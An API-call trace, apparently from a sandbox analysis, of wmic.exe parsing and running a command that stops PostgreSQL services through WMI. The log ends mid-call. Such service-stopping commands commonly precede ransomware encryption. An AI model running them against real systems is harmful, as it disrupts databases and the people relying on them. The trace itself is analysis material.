SysStringLen (param_1="XML") returned 0x3 [0108.158] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0108.158] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.158] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0108.158] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.158] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0108.158] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.158] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.158] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0108.158] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0108.158] SysStringLen (param_1="TABLE") returned 0x5 [0108.158] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0108.158] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.158] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0108.158] SysStringLen (param_1="XML") returned 0x3 [0108.159] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0108.159] SysStringLen (param_1="texttablewsys") returned 0xd [0108.159] SysStringLen (param_1="XML") returned 0x3 [0108.159] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0108.159] SysStringLen (param_1="htable-sortby") returned 0xd [0108.159] SysStringLen (param_1="TABLE") returned 0x5 [0108.159] SysStringLen (param_1="htable-sortby") returned 0xd [0108.159] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.159] SysStringLen (param_1="htable-sortby") returned 0xd [0108.159] SysStringLen (param_1="XML") returned 0x3 [0108.159] SysStringLen (param_1="htable-sortby") returned 0xd [0108.159] SysStringLen (param_1="texttablewsys") returned 0xd [0108.159] SysStringLen (param_1="htable-sortby") returned 0xd [0108.159] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0108.159] SysStringLen (param_1="XML") returned 0x3 [0108.160] SysStringLen (param_1="htable-sortby") returned 0xd [0108.160] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0108.160] SysStringLen (param_1="TABLE") returned 0x5 [0108.160] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0108.160] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.160] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0108.160] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.160] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0108.160] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0108.160] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.160] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0108.161] SysStringLen (param_1="wmiclimofformat") returned 0xf [0108.161] SysStringLen (param_1="TABLE") returned 0x5 [0108.161] SysStringLen (param_1="wmiclimofformat") returned 0xf [0108.161] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.161] SysStringLen (param_1="wmiclimofformat") returned 0xf [0108.161] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.161] SysStringLen (param_1="wmiclimofformat") returned 0xf [0108.161] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0108.161] SysStringLen (param_1="wmiclimofformat") returned 0xf [0108.161] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0108.161] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.161] SysStringLen (param_1="wmiclimofformat") returned 0xf [0108.161] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0108.161] SysStringLen (param_1="TABLE") returned 0x5 [0108.161] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0108.161] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.161] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0108.161] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.162] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0108.162] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.162] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.162] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0108.162] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0108.162] SysStringLen (param_1="TABLE") returned 0x5 [0108.162] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0108.162] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.162] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0108.162] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.162] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0108.162] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.162] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0108.162] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0108.162] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.162] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0108.163] FreeThreadedDOMDocument:IUnknown:Release (This=0x12b45a8) returned 0x0 [0108.163] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE" [0108.163] memcpy_s (in: _Destination=0x1158040, _DestinationSize=0x8e, _Source=0xe21588, _SourceSize=0x84 | out: _Destination=0x1158040) returned 0x0 [0108.163] GetLocalTime (in: lpSystemTime=0xd4fb88 | out: lpSystemTime=0xd4fb88*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0x1, wMilliseconds=0x1b)) [0108.163] _vsnwprintf (in: _Buffer=0x11580d8, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xd4fb68 | out: _Buffer="04-15-2018T10:09:01") returned 19 [0108.163] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE") returned 62 [0108.163] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE") returned 62 [0108.163] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE") returned 62 [0108.163] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE") returned 62 [0108.163] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE") returned 62 [0108.163] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE") returned 62 [0108.163] lstrlenW (lpString="SERVICE") returned 7 [0108.163] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0108.164] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE") returned 62 [0108.164] lstrlenW (lpString="WHERE") returned 5 [0108.164] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0108.164] memmove_s (in: _Destination=0x1152c78, _DestinationSize=0x4, _Source=0x1152c68, _SourceSize=0x4 | out: _Destination=0x1152c78) returned 0x0 [0108.164] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE") returned 62 [0108.164] lstrlenW (lpString="'caption LIKE '%postgresql%''") returned 29 [0108.164] _wcsicmp (_String1="'caption LIKE '%postgresql%''", _String2="\"NULL\"") returned 5 [0108.164] lstrlenW (lpString="'caption LIKE '%postgresql%''") returned 29 [0108.164] lstrlenW (lpString="'caption LIKE '%postgresql%''") returned 29 [0108.164] memmove_s (in: _Destination=0x1157e78, _DestinationSize=0x8, _Source=0x1152c78, _SourceSize=0x8 | out: _Destination=0x1157e78) returned 0x0 [0108.164] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE") returned 62 [0108.164] lstrlenW (lpString="CALL") returned 4 [0108.164] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0108.164] memmove_s (in: _Destination=0x1158010, _DestinationSize=0xc, _Source=0x1157e78, _SourceSize=0xc | out: _Destination=0x1158010) returned 0x0 [0108.164] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE") returned 62 [0108.164] lstrlenW (lpString="STOPSERVICE") returned 11 [0108.164] _wcsicmp (_String1="STOPSERVICE", _String2="\"NULL\"") returned 81 [0108.164] memmove_s (in: _Destination=0x1152598, _DestinationSize=0x10, _Source=0x1158010, _SourceSize=0x10 | out: _Destination=0x1152598) returned 0x0 [0108.164] lstrlenW (lpString="QUIT") returned 4 [0108.164] lstrlenW (lpString="SERVICE") returned 7 [0108.164] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0108.164] lstrlenW (lpString="EXIT") returned 4 [0108.164] lstrlenW (lpString="SERVICE") returned 7 [0108.164] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0108.165] WbemLocator:IUnknown:AddRef (This=0xe20500) returned 0x2 [0108.165] lstrlenW (lpString="/") returned 1 [0108.165] lstrlenW (lpString="SERVICE") returned 7 [0108.165] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0108.165] lstrlenW (lpString="-") returned 1 [0108.165] lstrlenW (lpString="SERVICE") returned 7 [0108.165] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0108.165] lstrlenW (lpString="CLASS") returned 5 [0108.165] lstrlenW (lpString="SERVICE") returned 7 [0108.165] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0108.165] lstrlenW (lpString="PATH") returned 4 [0108.165] lstrlenW (lpString="SERVICE") returned 7 [0108.165] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0108.165] lstrlenW (lpString="CONTEXT") returned 7 [0108.165] lstrlenW (lpString="SERVICE") returned 7 [0108.165] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0108.165] lstrlenW (lpString="SERVICE") returned 7 [0108.165] lstrlenW (lpString="SERVICE") returned 7 [0108.165] GetCurrentThreadId () returned 0xd70 [0108.165] ??0CHString@@QAE@XZ () returned 0xd4fadc [0108.165] WbemLocator:IWbemLocator:ConnectServer (in: This=0xe20500, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0xe509e0) returned 0x0 [0108.228] CoSetProxyBlanket (pProxy=0xe509e0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0108.228] ??1CHString@@QAE@XZ () returned 0x74a66430 [0108.228] GetCurrentThreadId () returned 0xd70 [0108.228] ??0CHString@@QAE@XZ () returned 0xd4fa84 [0108.228] SysStringLen (param_1="root\\cli") returned 0x8 [0108.228] SysStringLen (param_1="\\") returned 0x1 [0108.228] SysStringLen (param_1="root\\cli\\") returned 0x9 [0108.228] SysStringLen (param_1="ms_409") returned 0x6 [0108.229] WbemLocator:IWbemLocator:ConnectServer (in: This=0xe20500, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0xe50990) returned 0x0 [0108.239] ??1CHString@@QAE@XZ () returned 0x74a66430 [0108.239] GetCurrentThreadId () returned 0xd70 [0108.239] ??0CHString@@QAE@XZ () returned 0xd4fae0 [0108.239] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0108.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x1158270, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0108.239] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0108.239] SysStringLen (param_1="SERVICE") returned 0x7 [0108.239] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0108.239] SysStringLen (param_1="'") returned 0x1 [0108.240] IWbemServices:GetObject (in: This=0xe509e0, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xd4fadc*=0x0, ppCallResult=0x0 | out: ppObject=0xd4fadc*=0xe75318, ppCallResult=0x0) returned 0x0 [0108.275] IWbemClassObject:Get (in: This=0xe75318, wszName="Target", lFlags=0, pVal=0xd4fab4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4fab4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.275] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0108.275] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0108.275] IWbemClassObject:Get (in: This=0xe75318, wszName="PWhere", lFlags=0, pVal=0xd4fab4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4fab4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.275] lstrlenW (lpString="WHERE Name='#'") returned 14 [0108.275] lstrlenW (lpString="WHERE Name='#'") returned 14 [0108.275] IWbemClassObject:Get (in: This=0xe75318, wszName="Connection", lFlags=0, pVal=0xd4fab4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4fab4*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe756d8, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.275] IUnknown:QueryInterface (in: This=0xe756d8, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xd4fad0 | out: ppvObject=0xd4fad0*=0xe756d8) returned 0x0 [0108.275] GetCurrentThreadId () returned 0xd70 [0108.275] ??0CHString@@QAE@XZ () returned 0xd4fa50 [0108.276] IWbemClassObject:Get (in: This=0xe756d8, wszName="Namespace", lFlags=0, pVal=0xd4fa34*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4fa34*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.276] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0108.276] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0108.276] IWbemClassObject:Get (in: This=0xe756d8, wszName="Locale", lFlags=0, pVal=0xd4fa34*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe57164, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4fa34*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.276] lstrlenW (lpString="ms_409") returned 6 [0108.276] lstrlenW (lpString="ms_409") returned 6 [0108.276] IWbemClassObject:Get (in: This=0xe756d8, wszName="User", lFlags=0, pVal=0xd4fa34*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe57164, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4fa34*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.276] IWbemClassObject:Get (in: This=0xe756d8, wszName="Password", lFlags=0, pVal=0xd4fa34*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4fa34*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.276] IWbemClassObject:Get (in: This=0xe756d8, wszName="Server", lFlags=0, pVal=0xd4fa34*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4fa34*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.276] lstrlenW (lpString=".") returned 1 [0108.276] lstrlenW (lpString=".") returned 1 [0108.276] IWbemClassObject:Get (in: This=0xe756d8, wszName="Authority", lFlags=0, pVal=0xd4fa34*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe57164, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4fa34*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.276] ??1CHString@@QAE@XZ () returned 0x74a66430 [0108.276] IUnknown:Release (This=0xe756d8) returned 0x1 [0108.276] GetCurrentThreadId () returned 0xd70 [0108.276] ??0CHString@@QAE@XZ () returned 0xd4fa40 [0108.276] IWbemClassObject:Get (in: This=0xe75318, wszName="__RELPATH", lFlags=0, pVal=0xd4fa28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4fa28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.277] GetCurrentThreadId () returned 0xd70 [0108.277] ??0CHString@@QAE@XZ () returned 0xd4f9bc [0108.277] ??0CHString@@QAE@PBG@Z () returned 0xd4f9b8 [0108.277] ??0CHString@@QAE@ABV0@@Z () returned 0xd4f938 [0108.277] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0108.277] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x11599f0 [0108.277] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0108.277] ?Left@CHString@@QBE?AV1@H@Z () returned 0xd4f930 [0108.277] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xd4f934 [0108.277] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xd4f9b8 [0108.277] ??1CHString@@QAE@XZ () returned 0x1 [0108.277] ??1CHString@@QAE@XZ () returned 0x1 [0108.277] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xd4f92c [0108.277] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xd4f938 [0108.277] ??1CHString@@QAE@XZ () returned 0x1 [0108.277] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x1158270 [0108.277] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0108.277] ?Left@CHString@@QBE?AV1@H@Z () returned 0xd4f930 [0108.277] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xd4f934 [0108.277] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xd4f9b8 [0108.277] ??1CHString@@QAE@XZ () returned 0x1 [0108.277] ??1CHString@@QAE@XZ () returned 0x1 [0108.277] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xd4f92c [0108.277] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xd4f938 [0108.277] ??1CHString@@QAE@XZ () returned 0x74a66430 [0108.277] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0108.277] ??1CHString@@QAE@XZ () returned 0x74a66430 [0108.277] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0108.277] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0108.277] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0108.277] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0108.277] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0108.277] SysStringLen (param_1="\"") returned 0x1 [0108.278] IWbemServices:GetObject (in: This=0xe50990, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xd4f9c8*=0x0, ppCallResult=0x0 | out: ppObject=0xd4f9c8*=0xe77148, ppCallResult=0x0) returned 0x0 [0108.320] IWbemClassObject:Get (in: This=0xe77148, wszName="Text", lFlags=0, pVal=0xd4f994*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4f994*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe5f498*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xe535f8, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.320] SafeArrayGetLBound (in: psa=0xe5f498, nDim=0x1, plLbound=0xd4f9a4 | out: plLbound=0xd4f9a4) returned 0x0 [0108.320] SafeArrayGetUBound (in: psa=0xe5f498, nDim=0x1, plUbound=0xd4f9a8 | out: plUbound=0xd4f9a8) returned 0x0 [0108.320] SafeArrayGetElement (in: psa=0xe5f498, rgIndices=0xd4f9c0, pv=0xd4f9ac | out: pv=0xd4f9ac) returned 0x0 [0108.320] SysStringLen (param_1="Service application management. ") returned 0x20 [0108.321] IUnknown:Release (This=0xe77148) returned 0x0 [0108.321] ??1CHString@@QAE@XZ () returned 0x1 [0108.321] ??1CHString@@QAE@XZ () returned 0x74a66430 [0108.321] ??1CHString@@QAE@XZ () returned 0x74a66430 [0108.321] lstrlenW (lpString="Service application management. ") returned 32 [0108.321] lstrlenW (lpString="Service application management. ") returned 32 [0108.321] IUnknown:Release (This=0xe75318) returned 0x0 [0108.321] ??1CHString@@QAE@XZ () returned 0x74a66430 [0108.321] lstrlenW (lpString="PATH") returned 4 [0108.321] lstrlenW (lpString="WHERE") returned 5 [0108.321] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0108.321] lstrlenW (lpString="WHERE") returned 5 [0108.321] lstrlenW (lpString="WHERE") returned 5 [0108.321] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0108.321] lstrlenW (lpString="/") returned 1 [0108.321] lstrlenW (lpString="caption LIKE '%postgresql%'") returned 27 [0108.321] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%postgresql%'", cchCount1=27, lpString2="/", cchCount2=1) returned 3 [0108.321] lstrlenW (lpString="-") returned 1 [0108.322] lstrlenW (lpString="caption LIKE '%postgresql%'") returned 27 [0108.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%postgresql%'", cchCount1=27, lpString2="-", cchCount2=1) returned 3 [0108.322] lstrlenW (lpString="caption LIKE '%postgresql%'") returned 27 [0108.322] lstrlenW (lpString="caption LIKE '%postgresql%'") returned 27 [0108.322] lstrlenW (lpString="/") returned 1 [0108.322] lstrlenW (lpString="CALL") returned 4 [0108.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0108.322] lstrlenW (lpString="-") returned 1 [0108.322] lstrlenW (lpString="CALL") returned 4 [0108.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0108.322] lstrlenW (lpString="CALL") returned 4 [0108.322] lstrlenW (lpString="CALL") returned 4 [0108.322] lstrlenW (lpString="GET") returned 3 [0108.322] lstrlenW (lpString="CALL") returned 4 [0108.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0108.322] lstrlenW (lpString="LIST") returned 4 [0108.322] lstrlenW (lpString="CALL") returned 4 [0108.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0108.322] lstrlenW (lpString="SET") returned 3 [0108.322] lstrlenW (lpString="CALL") returned 4 [0108.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0108.322] lstrlenW (lpString="CREATE") returned 6 [0108.322] lstrlenW (lpString="CALL") returned 4 [0108.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0108.322] lstrlenW (lpString="CALL") returned 4 [0108.322] lstrlenW (lpString="CALL") returned 4 [0108.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0108.322] lstrlenW (lpString="/") returned 1 [0108.322] lstrlenW (lpString="STOPSERVICE") returned 11 [0108.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0108.322] lstrlenW (lpString="-") returned 1 [0108.322] lstrlenW (lpString="STOPSERVICE") returned 11 [0108.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0108.322] lstrlenW (lpString="STOPSERVICE") returned 11 [0108.322] lstrlenW (lpString="STOPSERVICE") returned 11 [0108.322] GetCurrentThreadId () returned 0xd70 [0108.322] ??0CHString@@QAE@XZ () returned 0xd4f24c [0108.322] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0108.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x1159a40, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0108.323] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0108.323] SysStringLen (param_1="SERVICE") returned 0x7 [0108.323] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0108.323] SysStringLen (param_1="'") returned 0x1 [0108.323] IWbemServices:GetObject (in: This=0xe509e0, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xd4f228*=0x0, ppCallResult=0x0 | out: ppObject=0xd4f228*=0xe75318, ppCallResult=0x0) returned 0x0 [0108.333] lstrlenW (lpString="CALL") returned 4 [0108.333] lstrlenW (lpString="CALL") returned 4 [0108.333] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0108.333] IWbemClassObject:Get (in: This=0xe75318, wszName="Verbs", lFlags=0, pVal=0xd4f1e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4f1e0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe5f138*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xe5f4e8, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.335] SafeArrayGetLBound (in: psa=0xe5f138, nDim=0x1, plLbound=0xd4f1f0 | out: plLbound=0xd4f1f0) returned 0x0 [0108.335] SafeArrayGetUBound (in: psa=0xe5f138, nDim=0x1, plUbound=0xd4f1f8 | out: plUbound=0xd4f1f8) returned 0x0 [0108.335] SafeArrayGetElement (in: psa=0xe5f138, rgIndices=0xd4f200, pv=0xd4f234 | out: pv=0xd4f234) returned 0x0 [0108.335] IWbemClassObject:Get (in: This=0xe78370, wszName="Name", lFlags=0, 